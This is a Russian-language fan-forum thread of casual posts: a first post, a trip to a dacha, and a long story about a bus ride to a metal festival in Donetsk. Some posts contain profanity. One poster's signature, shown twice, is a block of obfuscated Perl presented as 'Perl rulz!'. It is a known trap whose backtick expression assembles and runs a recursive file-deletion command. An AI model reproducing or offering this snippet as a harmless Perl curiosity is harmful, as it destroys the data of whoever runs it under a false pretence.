Добавлено: Пт Июн 01, 2007 9:49 am Заголовок сообщения:
если бы ни регистрация я бы проголосовал, хоть и не фанат соад, мне не жалко _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
епстр, мой первый пост на этом форуме) _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
http://www.soad.msk.ru/phpBB2/viewtopic.php?p=3#3
а вот наши первые ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вт Апр 08, 2008 11:19 am Заголовок сообщения:
Еду на дачу.Вернусь дня через четыре повзрослевшим и возмужавшим.Не скучайте. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Сб Апр 12, 2008 5:46 am Заголовок сообщения:
Ох,да,вот это были деньки.С другой стороны,вроде ничего такого,но для подростка,который целыми днями только и делает,что втыкает в ящик это было действительно незабываемо.Ну сначала непосредственно дача.Значит,ничто так не поднимает самооценку,как физический труд.Полазив на высокие деревья,попилив там ветки,наносив воды,убрав участок,поработав дрелью и болгаркой как-то забываешь о том,что у тебя нихуя практически не получается и ты интернет-пиздабол.Сразу возникает образ вполне сформировавшегося мужчины,которому под силу абсолютно всё.А то,что не под силу,на самом деле под силу,просто в данный момент не требуется.В свободное время мы ели(тут ничего такого),делали уроки(тут всемогущий мужчина становится ещё и интеллектуально развитым,если не считать того случая с физикой)и смотрели видак(этому пожалуй стоит уделить особое внимание).Смотрели мульты Текса Эвери,Эйса Вентуру и Полицейского из Беверли Хиллз 3.Смотреть последнюю картину особого настроения не было,поэтому мы сопровождали её различными комментариями,в результате чего,вышло,что вся съёмочная бригада-укурки и фильм ни о чём.Эйс Вентура.После просмотра фильма у нас появился новый обычай.Теперь когда страшно,говорят"я ищу Рэя Финкла".Кто плохо помнит,там в фильме Эйс пришёл домой к Рэю и говорит в окошечко эти слова.А после того,как из него(окошечка)высовывается ствол,направленый на башку главного героя,добовляет"и пару чистых трусов".Вторая часть фразы со временем стопталась.Мульты Текса Эвери.Тупость та ещё.Вынесли для себя две вещи.1-Всё взрывается.2-Всё стреляет.Хотя ржали конечно до слёз.Потом в обиход ещё как-то незаметно вошли фразочки "это безумие","это Спарта","ты не в теме" и "ты тефтеля".Все вышеперечисленные употребляются в тему и без темы,в любое время дня и ночи.А,вспомнил.Ещё отсняли кое-какой материал.Буду монтировать из него клип на Sixpounder(это пародия типа будет).Казалось бы на этом приключения закончились.Но нет,буквально заехав домой,чтобы помыться,я сел на бооольшой автобус.Он три часа вёз нас в Донецк.Нет ничего тупее,чем толпа орущих песни Генератора Зла.Конечно изнутри это весело,но я пытался сосредоточится на Coolio.Тут как никогда пригодилась аксиома о том,что абсолютно всё стреляет.Достаточно было заглянуть в рукав куртки и ты застрелен.Правда вопли "возьми меня с собой пурпурная река!!!" возвращали к суровой действительности,где послушать Тараканов не представлялось возможным.Приехали,пошли.Это был металл-фест к слову.Я лично ехал только ради Мастера,который меня разачровал тем,что играл мало,но порадовал тем,что сыграл в конце Воля и Разум.Больше всех понравился Маврин,несмотря на то,что самого Маврина не было.Его не пропустили на таможне.Но было всё-равно отличненько,спели даже для Донецких байкеров Герой Асфальта.В начале двенадцатого стали собираться в родные пенаты.Водила врроде вывез нас из Донецка,потом матюкнулся,развернул автобус,покатил его обратно в Донецк,вывез из Донецка уже в сторону Луганска.До дома добираться три квартала пешкодралом мне не улыбалось,поэтому пришлось расколешиться 15 грн на такси(барыга,но делать нечего).И вот наконец в начале четвёртого я дома,почитал форум,послушал три альбома AC/DC,в данный момент хочу есть и спать. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.